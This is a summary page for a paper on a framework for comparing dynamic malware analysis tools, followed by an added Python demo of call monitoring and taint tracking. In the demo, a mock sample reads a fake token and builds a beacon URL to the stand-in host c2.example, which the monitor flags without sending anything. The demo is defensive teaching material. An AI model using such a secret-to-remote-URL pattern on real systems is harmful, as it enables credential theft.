A Framework for Analysis and Comparison of Dynamic Malware Analysis Tools
Waqas Aman

TL;DR
This paper introduces a comparison framework for dynamic malware analysis tools, focusing on function call monitoring and information flow tracking, to help researchers select the most suitable tools for analyzing malicious code behavior.
Contribution
It provides a structured framework to evaluate and compare dynamic malware analysis tools based on their implementation, approach, and system support.
Findings
Framework aids in tool selection for malware analysis
Highlights differences in analysis strategies
Supports effective malware investigation
Abstract
Malware writers have employed various obfuscation and polymorphism techniques to thwart static analysis approaches and bypass antivirus tools. Dynamic analysis techniques, however, have essentially overcome these deceits by observing the actual behaviour of the code execution. In this regard, various methods, techniques and tools have been proposed. However, because of the diverse concepts and strategies used in the implementation of these methods and tools, security researchers and malware analysts find it difficult to select the optimum tool to investigate the behaviour of a malware and to contain the associated risk for their study. Focusing on two dynamic analysis techniques, Function Call monitoring and Information Flow Tracking, this paper presents a comparison framework for dynamic malware analysis tools. The framework will assist the researchers and analysts to…
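The two techniques the abstract names can be shown side by side in miniature. The following is an added illustration, not code from the paper or from any tool it surveys: a function-call monitor built on Python's `sys.setprofile` hook (standing in for the API hooking a sandbox does on native calls) and a tiny taint-propagating string type (standing in for information flow tracking). The "sample" being analysed, the secret it reads and the `c2.example` host are constructed stand-ins; the `Tainted` class, `monitor_calls` and `analyze_sample` are names chosen here.

```python
import sys
from typing import Callable, List, Tuple

# ---- Function call monitoring ------------------------------------------------
# A profile hook fires on every Python-level call made while the sample runs,
# so the monitor sees which functions were invoked, in what order, with what
# arguments. Real sandboxes do the same for Win32/POSIX APIs via inline or
# import-table hooks; the principle is identical.
CallRecord = Tuple[str, str]  # (callee name, repr of its positional arguments)


def monitor_calls(sample: Callable[[], object]) -> Tuple[object, List[CallRecord]]:
    """Run `sample` under a call hook and return (its result, the call trace)."""
    trace: List[CallRecord] = []

    def hook(frame, event, arg):
        if event == "call":  # ignore 'return' and C-level 'c_call' events
            code = frame.f_code
            args = {k: frame.f_locals[k] for k in code.co_varnames[: code.co_argcount]}
            trace.append((code.co_name, repr(args)))

    sys.setprofile(hook)
    try:
        result = sample()
    finally:
        sys.setprofile(None)  # always detach, even if the sample raises
    return result, trace


# ---- Information flow tracking -----------------------------------------------
class Tainted(str):
    """A str carrying a taint label that survives concatenation and slicing.

    Caveat (deliberate): operations not modelled here, e.g. .upper(), return a
    plain str and silently drop the label. Real taint trackers must model every
    propagation path or they under-report flows, which is exactly the kind of
    implementation difference a comparison framework has to surface.
    """

    def __new__(cls, value, label="untrusted"):
        obj = super().__new__(cls, value)
        obj.label = label
        return obj

    def __add__(self, other):
        return Tainted(str.__add__(self, other), self.label)

    def __radd__(self, other):  # plain_str + Tainted also stays tainted
        return Tainted(str.__add__(other, self), self.label)

    def __getitem__(self, key):
        return Tainted(str.__getitem__(self, key), self.label)


def analyze_sample():
    """Run a constructed 'sample' under both monitors.

    Returns (sample result, list of called function names, list of taint alerts).
    """
    alerts: List[Tuple[str, str, str]] = []

    def read_secret():
        # Constructed stand-in for reading a credential file; data is labelled.
        return Tainted("user=alice;token=abc123", label="secret")

    def build_beacon(secret):
        # Slicing then concatenation: both propagate the label.
        return "http://c2.example/" + secret[:10]

    def send(url):
        # The network sink: report if labelled data reaches it.
        if isinstance(url, Tainted):
            alerts.append(("send", url.label, str(url)))
        return len(url)

    def sample():
        return send(build_beacon(read_secret()))

    result, trace = monitor_calls(sample)
    return result, [name for name, _ in trace], alerts


if __name__ == "__main__":
    result, names, alerts = analyze_sample()
    print("calls:", [n for n in names if not n.startswith("__")])
    print("taint alerts:", alerts)
```

The call trace also contains the `__new__`, `__getitem__` and `__radd__` calls made by `Tainted` itself, which is why the usage line filters dunder names; a real monitor would likewise need to separate the instrumentation's own activity from the sample's.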
